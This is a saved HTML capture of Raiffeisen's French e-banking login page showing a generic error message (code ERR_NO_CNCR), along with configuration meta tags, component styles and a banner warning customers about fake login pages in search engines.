<html lang="fr" translate="no">
  <head>
    <meta charset="utf-8" />
    <meta name="google" content="notranslate" />
    <script
      type="text/javascript"
      src="/dynatrace/ruxitagentjs_ICA2NVfgjqrux_10251220909040818.js"
      data-dtconfig="rid=RID_1227778759|rpid=971486943|domain=raiffeisen.ch|reportUrl=/dynatrace/rb_b5aaae40-417f-4393-9a89-2efba03aba2b|uam=1|app=4c56d2bbeff7b9b1|agentId=e360bef154bac6c9|ssc=1|cssm=l|featureHash=ICA2NVfgjqrux|rdnt=1|uxrgce=1|bp=3|cuc=efriixkb|mel=100000|ssv=4|lastModification=1713904262977|tp=500,50,0,1|agentUri=/dynatrace/ruxitagentjs_ICA2NVfgjqrux_10251220909040818.js"
    ></script>
    <script
      src="/rfdwdc/static/modernizr.js"
      async=""
      type="application/javascript"
    ></script>
    <title>Login Raiffeisen</title>
    <meta name="description" content="Login Raiffeisen" />
    <link rel="alternate" hreflang="de" href="https://login.raiffeisen.ch/de" />
    <link rel="alternate" hreflang="it" href="https://login.raiffeisen.ch/it" />
    <link rel="alternate" hreflang="fr" href="https://login.raiffeisen.ch/fr" />
    <base href="/" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <link rel="icon" type="image/x-icon" href="favicon.ico" />
    <meta name="config" property="mobileTANResendTimout" content="5000" />
    <meta name="config" property="maxFirstFactorRetries" content="6" />
    <meta name="config" property="maxSecondFactorRetries" content="6" />
    <meta name="config" property="maxVerifyRetries" content="6" />
    <meta
      name="config"
      property="baseUrl"
      content="https://login.raiffeisen.ch"
    />
    <meta
      name="config"
      property="loginApiBaseUrl"
      content="/auth/rest/public/authentication"
    />
    <meta
      name="config"
      property="loginApiBaseUrlRCH"
      content="/auth/rest/public/authentication/rch"
    />
    <meta
      name="config"
      property="wwwBaseUrl"
      content="https://www.raiffeisen.ch"
    />
    <meta
      name="config"
      property="nativeInterfaceBaseUrl"
      content="ch.raiffeisen.mobile:/"
    />
    <meta
      name="config"
      property="registrationUrl"
      content="https://registration.raiffeisen.ch"
    />
    <meta
      name="config"
      property="deviceTokenRegistrationUrl"
      content="https://account.raiffeisen.ch/register-device-token"
    />
    <meta
      name="config"
      property="logoutUrl"
      content="https://login.raiffeisen.ch/ses/logout"
    />
    <meta
      name="config"
      property="photoTanCustomUrlScheme"
      content="ch.raiffeisen.phototan.login"
    />
    <meta
      name="config"
      property="photoTanV7CustomUrlScheme"
      content="ch.raiffeisen.phototan"
    />
    <meta name="config" property="langCookieDomain" content="raiffeisen.ch" />
    <meta name="config" property="uglifyScripts" content="true" />
    <meta name="config" property="fakeBackendStoreUrl" content="undefined" />
    <meta
      name="config"
      property="selfServiceIdentificationUrl"
      content="https://login.raiffeisen.ch/identification"
    />
    <meta
      name="config"
      property="selfServiceUrl"
      content="https://login.raiffeisen.ch/selfservice"
    />
    <meta
      name="config"
      property="selfService1faUrl"
      content="https://login.raiffeisen.ch/selfservice1fa"
    />
    <meta
      name="config"
      property="loginNewsApiUrl"
      content="https://login.raiffeisen.ch/winwsapi/latest"
    />
    <meta
      name="config"
      property="rbApiUrl"
      content="https://api.raiffeisen.ch/rbstapi/v2"
    />
    <meta
      name="config"
      property="rbApiKey"
      content="1812bb81-2cf3-4214-a4ad-dcfe49f9c1ab"
    />
    <meta name="config" property="kscSitzcode" content="8890" />
    <meta name="config" property="disableAnimations" content="false" />
    <meta name="config" property="disableAnimationsWhenMatched" content="" />
    <meta name="config" property="minIosVersion" content="14" />
    <meta name="config" property="minAndroidVersion" content="7.0" />
    <meta
      name="config"
      property="urlParamDomainWhitelist"
      content="raiffeisen.ch"
    />
    <meta
      name="config"
      property="sessionJsIntervalCheckRoleSeconds"
      content="15"
    />
    <meta name="config" property="touchJsIntervalTouchSeconds" content="60" />
    <meta
      name="config"
      property="touchEbicsJsSessionTargetDurationSec"
      content="1800"
    />
    <meta
      name="config"
      property="touchEbicsJsSessionDurationWafSec"
      content="600"
    />
    <meta name="config" property="touchEbicsJsSessionOffsetSec" content="15" />
    <meta name="config" property="showPTLink1FAPos1" content="true" />
    <meta name="config" property="showPTLink1FAPos2" content="false" />
    <meta name="config" property="showPTLink2FA" content="false" />
    <meta name="config" property="ptLinkTranslationVar1FAPos1" content="var1" />
    <meta name="config" property="ptLinkTranslationVar1FAPos2" content="var1" />
    <meta name="config" property="ptLinkTranslationVar2FA" content="var1" />
    <meta
      name="config"
      property="activateFirefox119FixWhenMatched"
      content=""
    />
    <link rel="stylesheet" href="styles.c87177df71401b46.css" />
    <style type="text/css"></style>
    <style>
      .move-content-out[_ngcontent-ixj-c100] {
        margin-bottom: 100vh;
      }
    </style>
    <style>
      .loader[_ngcontent-ixj-c74] {
        position: relative;
        z-index: 99;
        width: 100%;
        height: 4px;
        background-color: #fff;
      }
      .loader[_ngcontent-ixj-c74]:not(.show):after {
        transform: translate(-100%);
        animation: 0;
        opacity: 1;
      }
    </style>
    <style>
      [_nghost-ixj-c48] {
        display: block;
      }
      [_nghost-ixj-c48] .menu[_ngcontent-ixj-c48] g[_ngcontent-ixj-c48] {
        stroke: var(--header-burger-color);
      }
      header[_ngcontent-ixj-c48] {
        height: 80px;
      }
      .menu[_ngcontent-ixj-c48] {
        padding: 0;
        border: none;
        margin-right: 30px;
        -webkit-appearance: none;
        appearance: none;
        background: none;
      }
      @media (min-width: 1200px) {
        .menu[_ngcontent-ixj-c48] {
          margin-left: -55px;
        }
      }
    </style>
    <style>
      [_nghost-ixj-c13] {
        display: inline-block;
        width: 141px;
      }
      path[_ngcontent-ixj-c13] {
        fill: var(--header-logo-color);
      }
    </style>
    <style>
      footer[_ngcontent-ixj-c66] {
        padding: 40px 0;
      }
      footer[_ngcontent-ixj-c66] .navigation[_ngcontent-ixj-c66] {
        z-index: 1;
      }
      footer[_ngcontent-ixj-c66]
        .navigation[_ngcontent-ixj-c66]
        .footer-navigation
        a {
        display: block;
        margin-bottom: 15px;
      }
      footer[_ngcontent-ixj-c66]
        .navigation[_ngcontent-ixj-c66]
        .footer-navigation
        a:hover {
        color: #fff;
      }
      footer[_ngcontent-ixj-c66]
        .navigation[_ngcontent-ixj-c66]
        .footer-navigation
        a:focus {
        color: #fff;
      }
      footer[_ngcontent-ixj-c66] .copyright[_ngcontent-ixj-c66] {
        margin-top: 40px;
        font-weight: 300;
      }
      @media (min-width: 576px) {
        footer[_ngcontent-ixj-c66] .copyright[_ngcontent-ixj-c66] {
          margin-top: -10px;
        }
        footer[_ngcontent-ixj-c66] .copyright-pull-up[_ngcontent-ixj-c66] {
          margin-top: -40px;
        }
      }
      footer[_ngcontent-ixj-c66]
        .copyright[_ngcontent-ixj-c66]
        .footer-copyright {
        text-align: left;
      }
      @media (min-width: 576px) {
        footer[_ngcontent-ixj-c66]
          .copyright[_ngcontent-ixj-c66]
          .footer-copyright {
          text-align: right;
        }
      }
    </style>
    <style>
      [_nghost-ixj-c73] {
        display: block;
      }
      .active[_ngcontent-ixj-c73] {
        font-weight: 700;
      }
    </style>
    <style>
      :is(
          [id*="google_ads_iframe"],
          [id*="taboola-"],
          .taboolaHeight,
          .taboola-placeholder,
          #credential_picker_container,
          #credentials-picker-container,
          #credential_picker_iframe,
          [id*="google-one-tap-iframe"],
          #google-one-tap-popup-container,
          .google-one-tap-modal-div,
          #amp_floatingAdDiv,
          #ez-content-blocker-container
        ) {
        display: none !important;
        min-height: 0 !important;
        height: 0 !important;
      }
    </style>
    <style>
      body {
        --wdc-t-src: "eyJ0aW1lIjoiMjAyNC0wNC0yNVQwOTo0OTozMi42MDVaIiwiZXh0ZW5zaW9ucyI6W10sIm1ldGhvZHMiOltdLCJ0YWdzIjpbImwxIl0sInJlZiI6IlUyRnNkR1ZrWDEvMlFwUVlIVWRLd0M1QnNyZXFMcWxaUGRabFlCNTNJOGNST2hkWG5VanA4WTJtaFg3MEl4cUxTRy9pUG5neXd0aGhEd3NRYUl3RlFYRHZXVkJ2ZS8rOUV4M2thTU81KzdjPSIsInVybCI6Imh0dHBzOi8vbG9naW4ucmFpZmZlaXNlbi5jaC9mcj9Mb2NhdGlvbj1odHRwcyUzQSUyRiUyRmViYW5raW5nLnJhaWZmZWlzZW4uY2glMkZhcHAlM0ZsYW5ndWFnZSUzRGZyJndlYklBTUNvbnRyYWN0Tm89QTNEMzQ4MTRGNjc4NzY4NDc5RTY4QTc0MjM4N0NBMTIifQ==";
      }
    </style>
    <style>
      .contract[_ngcontent-ixj-c106] {
        letter-spacing: 0.3em;
      }
      #password[_ngcontent-ixj-c106] {
        letter-spacing: 0.2em;
      }
      #password[_ngcontent-ixj-c106]::-ms-reveal {
        display: none;
        width: 0;
        height: 0;
      }
      .caps-lock-feedback[_ngcontent-ixj-c106] {
        color: var(--forms-color);
      }
      webiam-lib-password-reveal[_ngcontent-ixj-c106],
      webiam-lib-password-hide[_ngcontent-ixj-c106] {
        font-size: var(--fonts-l-xs-size);
        line-height: var(--fonts-l-xs-line);
      }
      @media (min-width: 576px) {
        webiam-lib-password-reveal[_ngcontent-ixj-c106],
        webiam-lib-password-hide[_ngcontent-ixj-c106] {
          font-size: var(--fonts-l-sm-size);
          line-height: var(--fonts-l-sm-line);
        }
      }
      @media (min-width: 1200px) {
        webiam-lib-password-reveal[_ngcontent-ixj-c106],
        webiam-lib-password-hide[_ngcontent-ixj-c106] {
          font-size: var(--fonts-l-xl-size);
          line-height: var(--fonts-l-xl-line);
        }
      }
      webiam-lib-password-hide[_ngcontent-ixj-c106] {
        color: #807466;
      }
      .arrow-up[_ngcontent-ixj-c106] {
        position: relative;
      }
      .arrow-up[_ngcontent-ixj-c106]:before {
        position: absolute;
        top: -26px;
        border-right: solid 18px transparent;
        border-bottom: solid 26px #333;
        border-left: solid 18px transparent;
        content: "";
      }
      @media (min-width: 576px) {
        h1[_ngcontent-ixj-c106] {
          margin-right: -50%;
        }
      }
      @media (min-width: 768px) {
        h1[_ngcontent-ixj-c106] {
          margin-right: -60%;
        }
      }
      @media (min-width: 992px) {
        h1[_ngcontent-ixj-c106] {
          margin-right: -20%;
        }
      }
      @media (min-width: 768px) {
        .h2-info-column[_ngcontent-ixj-c106] {
          padding-top: 14px;
        }
      }
      @media (min-width: 1200px) {
        .h2-info-column[_ngcontent-ixj-c106] {
          padding-top: 21px;
        }
      }
      input[_ngcontent-ixj-c106]:-webkit-autofill + label[_ngcontent-ixj-c106] {
        top: -25px;
        font-size: var(--fonts-s-xs-size);
        line-height: var(--fonts-s-xs-line);
      }
      @media (min-width: 1200px) {
        input[_ngcontent-ixj-c106]:-webkit-autofill
          + label[_ngcontent-ixj-c106] {
          font-size: var(--fonts-s-xl-size);
          line-height: var(--fonts-s-xl-line);
        }
      }
    </style>
    <style>
      .loading[_ngcontent-ixj-c57] {
        opacity: 0.3;
        transform: scale(0.99);
      }
    </style>
    <style>
      fieldset[_ngcontent-ixj-c65] {
        display: block;
        margin: unset;
        padding: unset;
        border: unset;
      }
      .firefox-119-fix[_ngcontent-ixj-c65] {
        display: inline-block;
        width: 100%;
      }
    </style>
    <style>
      [_nghost-ixj-c47] {
        position: relative;
        display: block;
        padding-top: 25px;
      }
      .ng-invalid.ng-touched[_nghost-ixj-c47]
        .rad-form-underline[_ngcontent-ixj-c47]:before {
        background: var(--forms-error-color);
      }
      .rad-focused[_nghost-ixj-c47]
        .rad-form-underline[_ngcontent-ixj-c47]:before {
        height: 3px;
        background-color: var(--forms-focus-border-color);
      }
      .rad-form-control-disabled[_nghost-ixj-c47]
        .rad-form-underline[_ngcontent-ixj-c47]:before {
        background-color: transparent;
      }
      .rad-form-field-wrapper[_ngcontent-ixj-c47] {
        position: relative;
        margin-bottom: 1px;
      }
      .rad-form-field-flex[_ngcontent-ixj-c47] {
        display: flex;
        width: 100%;
        align-items: baseline;
      }
      .rad-form-field-infix[_ngcontent-ixj-c47] {
        position: relative;
        display: block;
        min-width: 0;
        flex: auto;
        padding-bottom: 5px;
        border-bottom: 1px solid transparent;
      }
      .rad-form-underline[_ngcontent-ixj-c47]:before {
        position: absolute;
        bottom: 0;
        display: block;
        width: 100%;
        height: 1px;
        margin-top: -1px;
        background: var(--forms-border-color);
        content: "";
        transition: all 0.2s ease-in-out;
      }
      @media (prefers-reduced-motion: reduce) {
        .rad-form-underline[_ngcontent-ixj-c47]:before {
          transition: none;
        }
      }
      .rad-form-field-subscript-wrapper[_ngcontent-ixj-c47] {
        overflow: hidden;
        width: 100%;
        margin-top: 5px;
      }
      .rad-form-field-subscript-wrapper[_ngcontent-ixj-c47]:empty {
        margin-top: 0;
      }
    </style>
    <style>
      [_nghost-ixj-c70] {
        display: inline-block;
        width: 22px;
        height: 15px;
      }
    </style>
    <style id="autofill-detection-style">
      .detect:-webkit-autofill {
        animation-name: onautofillstart;
      }
      .detect:not(:-webkit-autofill) {
        animation-name: onautofillcancel;
      }

      @keyframes onautofillstart {
        from {
        }
      }
      @keyframes onautofillcancel {
        from {
        }
      }
    </style>
    <style>
      [_nghost-ixj-c102] {
        display: block;
        border-bottom: 1px solid #fff;
        background-color: #333;
        font-size: var(--fonts-s-xl-size);
      }
      h2[_ngcontent-ixj-c102] {
        align-items: center;
        margin-bottom: 0;
        font-size: var(--fonts-s-xl-size);
        font-weight: 700;
      }
      .detail[_ngcontent-ixj-c102] {
        margin-top: 0.5rem;
      }
      .detail[_ngcontent-ixj-c102]:empty {
        margin: 0;
      }
      .accordion-body[_ngcontent-ixj-c102] {
        overflow: hidden;
      }
      .btn-link[_ngcontent-ixj-c102] {
        font-size: var(--fonts-s-xl-size);
      }
    </style>
  </head>
  <body spellcheck="false">
    <noscript>
      <div>
        <h1>Login nicht möglich</h1>
        <p>
          Ihr Internet-Browser entspricht nicht den Anforderungen für Online
          Services von Raiffeisen.
        </p>
        <p>JavaScript: <strong>Nicht aktiviert</strong></p>
        <p>
          Online Services von Raiffeisen benötigen JavaScript, um einwandfrei
          funktionieren zu können.
        </p>
        <p>
          <a href="https://www.raiffeisen.ch/browsercheck"
            >Anleitung zum Beheben der Probleme</a
          >
        </p>
        <p>
          Bei Fragen hilft Ihnen das
          <a
            href="https://www.raiffeisen.ch/st--gallen/de/privatkunden/e-banking/support-kontakt-fragen-antworten.html"
            >Kunden Service Center</a
          >
          gerne weiter.
        </p>
        <p><a class="button" href="">Erneut versuchen</a></p>
      </div>
      <div>
        <h1>Login impossible</h1>
        <p>
          Votre navigateur Internet ne répond pas aux exigences des services en
          ligne de Raiffeisen.
        </p>
        <p>JavaScript: <strong>non activé</strong></p>
        <p>
          Les services en ligne de Raiffeisen nécessitent JavaScript pour
          fonctionner de manière optimale.
        </p>
        <p>
          <a href="https://www.raiffeisen.ch/browsercheck"
            >Marche à suivre pour résoudre le problème</a
          >
        </p>
        <p>
          Pour toute question, nous vous prions de bien vouloir contacter le
          <a
            href="https://www.raiffeisen.ch/st--gallen/fr/clients-prives/e-banking/assistance-et-contact-questions-et-reponses/questions-et-reponses.html"
            >Centre de service à la clientèle</a
          >.
        </p>
        <p><a class="button" href="">Veuillez svp réessayer</a></p>
      </div>
      <div>
        <h1>Login non possibile</h1>
        <p>
          Il vostro browser Internet non soddisfa i requisiti richiesti per i
          servizi online di Raiffeisen.
        </p>
        <p>JavaScript: <strong>non attivato</strong></p>
        <p>
          I servizi online di Raiffeisen richiedono JavaScript per funzionare
          correttamente.
        </p>
        <p>
          <a href="https://www.raiffeisen.ch/browsercheck"
            >Guida alla risoluzione dei problemi</a
          >
        </p>
        <p>
          In caso di domande il
          <a
            href="https://www.raiffeisen.ch/st--gallen/it/clientela-privata/e-banking/supporto-e-contatto-domande-e-risposte/domande-e-risposte.html"
            >Centro servizi clienti</a
          >
          è a vostra disposizione.
        </p>
        <p><a class="button" href="">Nuovo tentativo</a></p>
      </div>
    </noscript>
    <webiam-root _nghost-ixj-c100="" class="ng-tns-c100-0" ng-version="14.0.5"
      ><webiam-lib-loader
        _ngcontent-ixj-c100=""
        class="ng-tns-c100-0"
        _nghost-ixj-c74=""
        ><div _ngcontent-ixj-c74="" class="loader"></div
      ></webiam-lib-loader>
      <div _ngcontent-ixj-c100="" class="ie11-fixMinHeight ng-tns-c100-0">
        <div
          _ngcontent-ixj-c100=""
          class="app-container theme-light ng-tns-c100-0"
        >
          <rad-header
            _ngcontent-ixj-c100=""
            class="ng-tns-c100-0"
            _nghost-ixj-c48=""
            ><header _ngcontent-ixj-c48="" class="d-flex align-items-center">
              <div _ngcontent-ixj-c48="" class="container">
                <div _ngcontent-ixj-c48="" class="row justify-content-between">
                  <div _ngcontent-ixj-c48="" class="col-auto">
                    <!----><a
                      _ngcontent-ixj-c100=""
                      class="logo"
                      aria-label="Retour vers /fr/restart-login-flow - logo Raiffeisen"
                      href="./fr/restart-login-flow"
                      ><icon-logo
                        _ngcontent-ixj-c100=""
                        class="ng-tns-c100-0"
                        _nghost-ixj-c13=""
                        ><svg
                          _ngcontent-ixj-c13=""
                          viewBox="0 0 141 22"
                          version="1.1"
                          xmlns="http://www.w3.org/2000/svg"
                        >
                          <path
                            _ngcontent-ixj-c13=""
                            d="M140.626105,20.9306184 L139.037101,20.9306184 L132.564502,11.3048165 C131.343604,9.48314228 130.093931,7.46104422 130.093931,7.46104422 C130.093931,7.46104422 130.150983,9.48314228 130.150983,11.3048165 L130.150983,20.9306184 L126.857384,20.9306184 L126.857384,4.24434062 C126.857384,3.39055486 126.773047,2.90586649 126.517556,2.30905982 C126.147963,1.5118293 125.579434,0.96165591 125.579434,0.96165591 L130.177772,0.96165591 L134.83465,7.74580484 C136.083826,9.54019362 137.418828,11.6456363 137.418828,11.6456363 C137.418828,11.6456363 137.333499,9.54019362 137.333499,7.74580484 L137.333499,0.96165591 L140.626105,0.96165591 L140.626105,20.9306184 Z M3.9454725,20.9306184 L0,20.9306184 L0,0.77165013 C3.17949619,0.77165013 5.08153839,0.6 6.58570947,0.6 C10.6735623,0.6 13.6551151,2.36561507 13.6551151,6.72185724 C13.6551151,9.34076197 12.065119,11.3901455 9.73692804,12.0162219 C9.73692804,12.0162219 10.3327425,12.7286196 10.7018399,13.5541277 L14.1368269,20.9306184 L9.70865042,20.9306184 L5.90456603,12.7286196 C4.93915808,10.6494702 4.31456989,10.2233215 4.31456989,10.2233215 C4.712441,10.2515991 5.08153839,10.2515991 5.39358443,10.2515991 C8.26103458,10.2515991 9.62332145,8.94140256 9.62332145,6.83496773 C9.62332145,4.7285329 8.11865427,3.78892207 5.90456603,3.78892207 C4.74071862,3.78892207 3.9454725,3.87425104 3.9454725,3.87425104 L3.9454725,20.9306184 Z M87.8139245,0.96165591 L91.7603892,0.96165591 L91.7584048,20.9306184 L87.8139245,20.9306184 L87.8139245,0.96165591 Z M122.372156,17.5973317 L121.57691,20.9306184 L111.612272,20.9306184 L111.612272,0.970089587 L122.145439,0.970089587 L121.377974,4.24434062 L115.530459,4.24434062 L115.530459,9.22616318 L121.122979,9.22616318 L120.357003,12.443859 L115.530459,12.443859 L115.530459,17.5973317 L122.372156,17.5973317 Z M48.0412003,12.443859 L48.0412003,20.9306184 L44.1235093,20.9306184 L44.1235093,0.96165591 L54.6556835,0.96165591 L53.9179848,4.24434062 L48.0412003,4.24434062 L48.0412003,9.22616318 L53.6337203,9.22616318 L52.8955255,12.443859 L48.0412003,12.443859 Z M62.3209036,12.443859 L62.3209036,20.9306184 L58.3461613,20.9306184 L58.3461613,0.96165591 L68.8788315,0.96165591 L68.1406367,4.24434062 L62.3209036,4.24434062 L62.3209036,9.22616318 L67.8851459,9.22616318 L67.1469512,12.443859 L62.3209036,12.443859 Z M34.7829641,20.9306184 L38.7289327,20.9306184 L38.7289327,0.96165591 L34.7829641,0.96165591 L34.7829641,20.9306184 Z M83.4418071,17.5973317 L82.6475532,20.9306184 L72.6829159,20.9306184 L72.6829159,0.96165591 L83.2150901,0.96165591 L82.4208361,4.24434062 L76.601103,4.24434062 L76.601103,9.22616318 L82.1941191,9.22616318 L81.4266545,12.443859 L76.601103,12.443859 L76.601103,17.5973317 L83.4418071,17.5973317 Z M32.0440035,20.9306184 L27.6718861,20.9306184 L26.6216453,17.1984684 L20.5528706,17.1984684 L19.5309074,20.9306184 L15.8687073,20.9306184 L21.1491812,3.50515365 C21.2915615,3.02046527 21.3763944,2.73570465 21.3763944,2.45094403 C21.3763944,1.65321742 20.8088575,0.96165591 20.8088575,0.96165591 L25.6349051,0.96165591 L32.0440035,20.9306184 Z M25.926115,14.3235767 L24.1267652,8.03949523 C23.8712744,7.15693575 23.5870099,5.77629323 23.5870099,5.77629323 C23.5870099,5.77629323 23.3032415,7.15693575 23.0482468,8.03949523 L21.2627878,14.3235767 L25.926115,14.3235767 Z M96.8513534,16.9191648 C96.8513534,16.9191648 98.0925922,18.0036365 100.555722,18.0036365 C102.53714,18.0036365 103.500067,16.8348281 103.500067,15.4085445 C103.500067,14.03832 102.290083,13.2371207 101.190232,12.6393218 L99.6399239,11.7974424 C97.1465321,10.4430932 96.084881,8.76578364 96.084881,6.66778249 C96.084881,2.92918312 98.5981168,0.6 102.202769,0.6 C105.131736,0.6 106.849725,1.59914266 106.849725,1.59914266 L106.089206,4.87984298 C105.131736,4.05235045 103.969873,3.76758983 102.702837,3.76758983 C100.984847,3.76758983 99.9946344,4.85255756 99.9946344,6.22278201 C99.9946344,7.32858588 100.596898,7.96011945 101.582646,8.47358154 L103.498083,9.47222811 C106.517339,11.0448608 107.553193,12.6963732 107.553193,15.0354783 C107.553193,18.8435315 104.824651,21.2 100.69711,21.2 C97.6401503,21.2 96.0506502,20.2921395 96.0506502,20.2921395 L96.8513534,16.9191648 Z"
                          ></path></svg></icon-logo
                    ></a>
                  </div>
                  <div _ngcontent-ixj-c48="" class="col-auto">
                    <webiam-main-link _ngcontent-ixj-c100="" _nghost-ixj-c98=""
                      ><!----><!----><!----><!----><!----><!----></webiam-main-link
                    >
                  </div>
                </div>
              </div>
            </header></rad-header
          >
          <main
            _ngcontent-ixj-c100=""
            id="mainElement"
            class="ng-tns-c100-0 ng-trigger ng-trigger-routerTransition"
          >
            <router-outlet
              _ngcontent-ixj-c100=""
              class="ng-tns-c100-0"
            ></router-outlet
            ><webiam-first-factor
              _nghost-ixj-c106=""
              class="ng-star-inserted"
              style=""
              ><div
                _ngcontent-ixj-c106=""
                class="transition-fade-out-login-news"
              >
                <webiam-login-news
                  _ngcontent-ixj-c106=""
                  _nghost-ixj-c103=""
                  class="ng-tns-c103-1 ng-star-inserted"
                  ><div
                    _ngcontent-ixj-c103=""
                    class="ng-tns-c103-1 ng-star-inserted"
                    style=""
                  >
                    <div
                      _ngcontent-ixj-c103=""
                      class="ng-tns-c103-1 ng-trigger ng-trigger-listAnimation"
                    >
                      <div
                        _ngcontent-ixj-c103=""
                        class="ng-tns-c103-1 ng-star-inserted"
                        style=""
                      >
                        <webiam-notification-bar
                          _ngcontent-ixj-c103=""
                          class="ng-tns-c103-1 ng-tns-c102-3 ng-star-inserted"
                          _nghost-ixj-c102=""
                          ><div
                            _ngcontent-ixj-c102=""
                            class="container theme-inverted py-4 ng-tns-c102-3"
                          >
                            <div
                              _ngcontent-ixj-c102=""
                              class="row align-items-center ng-tns-c102-3"
                            >
                              <div
                                _ngcontent-ixj-c102=""
                                class="col-12 col-lg-10 ng-tns-c102-3"
                              >
                                <h2
                                  _ngcontent-ixj-c102=""
                                  class="d-inline-block mr-2 ng-tns-c102-3"
                                >
                                  Attention aux fausses pages de connexion à
                                  l’e-banking dans les moteurs de recherche
                                </h2>
                                <button
                                  _ngcontent-ixj-c102=""
                                  type="button"
                                  class="btn btn-link ng-tns-c102-3 ng-trigger ng-trigger-fadeInButton ng-star-inserted"
                                  tabindex="0"
                                >
                                  <span
                                    _ngcontent-ixj-c102=""
                                    class="no-wrap ng-tns-c102-3"
                                    >En voir plus</span
                                  ></button
                                ><!---->
                              </div>
                            </div>
                            <div
                              _ngcontent-ixj-c102=""
                              class="accordion-body ng-tns-c102-3 ng-trigger ng-trigger-accordionBodyAnimation"
                              style="height: 0px; visibility: hidden"
                            >
                              <div
                                _ngcontent-ixj-c102=""
                                class="row detail ng-tns-c102-3"
                              >
                                <div
                                  _ngcontent-ixj-c102=""
                                  class="col-12 col-lg-10 ng-tns-c102-3"
                                >
                                  <p
                                    _ngcontent-ixj-c102=""
                                    class="ng-tns-c102-3 ng-star-inserted"
                                    style=""
                                  >
                                    Nous vous mettons en garde contre les
                                    fausses pages de connexion à l’e-banking
                                    telles que proposées lors de recherches sur
                                    Google, Bing ou Yahoo.
                                  </p>
                                  <!----><a
                                    _ngcontent-ixj-c102=""
                                    class="ng-tns-c102-3 ng-star-inserted"
                                    href="https://www.raiffeisen.ch/rch/fr/clients-prives/e-banking/alertes-actuelles/hameconnage-par-le-biais-des-moteurs-de-recherche.html"
                                    style=""
                                    >Fausses pages de connexion à l’e-banking
                                    dans les moteurs de recherche</a
                                  ><!---->
                                </div>
                              </div>
                              <div
                                _ngcontent-ixj-c102=""
                                class="mt-4 ng-tns-c102-3"
                              >
                                <!---->
                              </div>
                            </div>
                          </div></webiam-notification-bar
                        >
                      </div>
                      <!---->
                    </div>
                  </div>
                  <!----></webiam-login-news
                >
              </div>
              <webiam-lib-grid
                _ngcontent-ixj-c106=""
                _nghost-ixj-c57=""
                class="ng-tns-c57-2 ng-star-inserted"
                ><!----><!----><!----><!----><!----><!----><!---->
                <div _ngcontent-ixj-c57="" class="container ng-tns-c57-2">
                  <div _ngcontent-ixj-c57="" class="row ng-tns-c57-2">
                    <div
                      _ngcontent-ixj-c57=""
                      class="col-12 col-sm-3 col-md-2 col-lg-3 ng-tns-c57-2"
                    ></div>
                    <div
                      _ngcontent-ixj-c57=""
                      class="col-12 col-sm-6 col-md-5 col-lg-5 ng-tns-c57-2 ng-trigger ng-trigger-loadingTransition"
                      style="opacity: 1"
                    >
                      <div
                        _ngcontent-ixj-c106=""
                        class="main-column transition-main-column ng-tns-c57-2 ng-star-inserted"
                        style=""
                      >
                        <!---->
                        <h1 _ngcontent-ixj-c106="" class="ng-star-inserted">
                          <span _ngcontent-ixj-c106="" class="ng-star-inserted"
                            >Une erreur s'est produite!</span
                          ><!----><!---->
                        </h1>
                        <!----><webiam-maintenance
                          _ngcontent-ixj-c106=""
                          _nghost-ixj-c104=""
                          ><div _ngcontent-ixj-c104="" class="ng-star-inserted">
                            <div
                              _ngcontent-ixj-c104=""
                              class="ng-star-inserted"
                            >
                              <div>
                                <p>
                                  Une erreur s'est produite. 
                                  Veuillez réessayer plus tard.
                                </p>
                              </div>
                              <div>
                                <p>
                                  Pour plus d'informations, veuillez contacter 
                                  le support avec le code suivant: ERR_NO_CNCR
                                </p>
                              </div>
                              <!---->
                            </div>
                            <!----><!---->
                          </div>
                          <!----></webiam-maintenance
                        >
                      </div>
                      <!---->
                    </div>
                    <div
                      _ngcontent-ixj-c57=""
                      class="col-12 col-sm-3 col-md-1 col-lg-1 ng-tns-c57-2"
                    >
                      <div
                        _ngcontent-ixj-c57=""
                        class="fill-parent ng-tns-c57-2 ng-star-inserted"
                      >
                        <!----><!---->
                      </div>
                      <!---->
                    </div>
                    <div
                      _ngcontent-ixj-c57=""
                      class="col-12 col-sm-12 col-md-4 col-lg-3 ng-tns-c57-2"
                    >
                      <div
                        _ngcontent-ixj-c57=""
                        class="ng-tns-c57-2 ng-star-inserted"
                      >
                        <!----><!---->
                      </div>
                      <!---->
                    </div>
                  </div>
                </div>
                <div _ngcontent-ixj-c57="" class="container ng-tns-c57-2">
                  <div _ngcontent-ixj-c57="" class="row ng-tns-c57-2">
                    <div
                      _ngcontent-ixj-c57=""
                      class="col-12 col-sm-2 col-lg-3 ng-tns-c57-2"
                    ></div>
                    <div
                      _ngcontent-ixj-c57=""
                      class="col-12 col-sm-6 col-lg-5 ng-tns-c57-2"
                    >
                      <!---->
                    </div>
                    <div
                      _ngcontent-ixj-c57=""
                      class="col-12 col-sm-4 col-lg-4 ng-tns-c57-2"
                    ></div>
                  </div>
                </div>
                <div _ngcontent-ixj-c57="" class="container ng-tns-c57-2">
                  <div _ngcontent-ixj-c57="" class="row ng-tns-c57-2">
                    <div _ngcontent-ixj-c57="" class="col ng-tns-c57-2">
                      <!---->
                    </div>
                  </div>
                </div>
                <div _ngcontent-ixj-c57="" class="container ng-tns-c57-2">
                  <div _ngcontent-ixj-c57="" class="row ng-tns-c57-2">
                    <div
                      _ngcontent-ixj-c57=""
                      class="col-12 col-sm-2 col-lg-3 ng-tns-c57-2"
                    ></div>
                    <div
                      _ngcontent-ixj-c57=""
                      class="col-12 col-sm-10 col-lg-9 ng-tns-c57-2"
                    >
                      <!---->
                    </div>
                  </div>
                </div></webiam-lib-grid
              ></webiam-first-factor
            ><!---->
          </main>
          <nav _ngcontent-ixj-c100="" class="container ng-tns-c100-0">
            <div _ngcontent-ixj-c100="" class="row mt-6 mb-4 ng-tns-c100-0">
              <div
                _ngcontent-ixj-c100=""
                class="offset-md-2 offset-lg-3 col-md-6 col-lg-5 ng-tns-c100-0"
              >
                <div
                  _ngcontent-ixj-c100=""
                  class="ng-tns-c100-0 ng-star-inserted"
                >
                  <a
                    _ngcontent-ixj-c100=""
                    class="btn btn-link ng-tns-c100-0 ng-trigger ng-trigger-ptLinkTransition"
                    href="./fr/first-factor"
                  >
                    Activer un nouvel appareil pour PhotoTAN
                  </a>
                </div>
                <!---->
              </div>
              <div
                _ngcontent-ixj-c100=""
                class="col-sm-12 col-md-4 help ng-tns-c100-0"
              >
                <div
                  _ngcontent-ixj-c100=""
                  class="ng-tns-c100-0 ng-star-inserted"
                >
                  <a
                    _ngcontent-ixj-c100=""
                    class="ng-tns-c100-0 ng-trigger ng-trigger-ptLinkTransition"
                    href="./fr/first-factor"
                  >
                    Aide et contact
                  </a>
                </div>
                <!---->
              </div>
            </div>
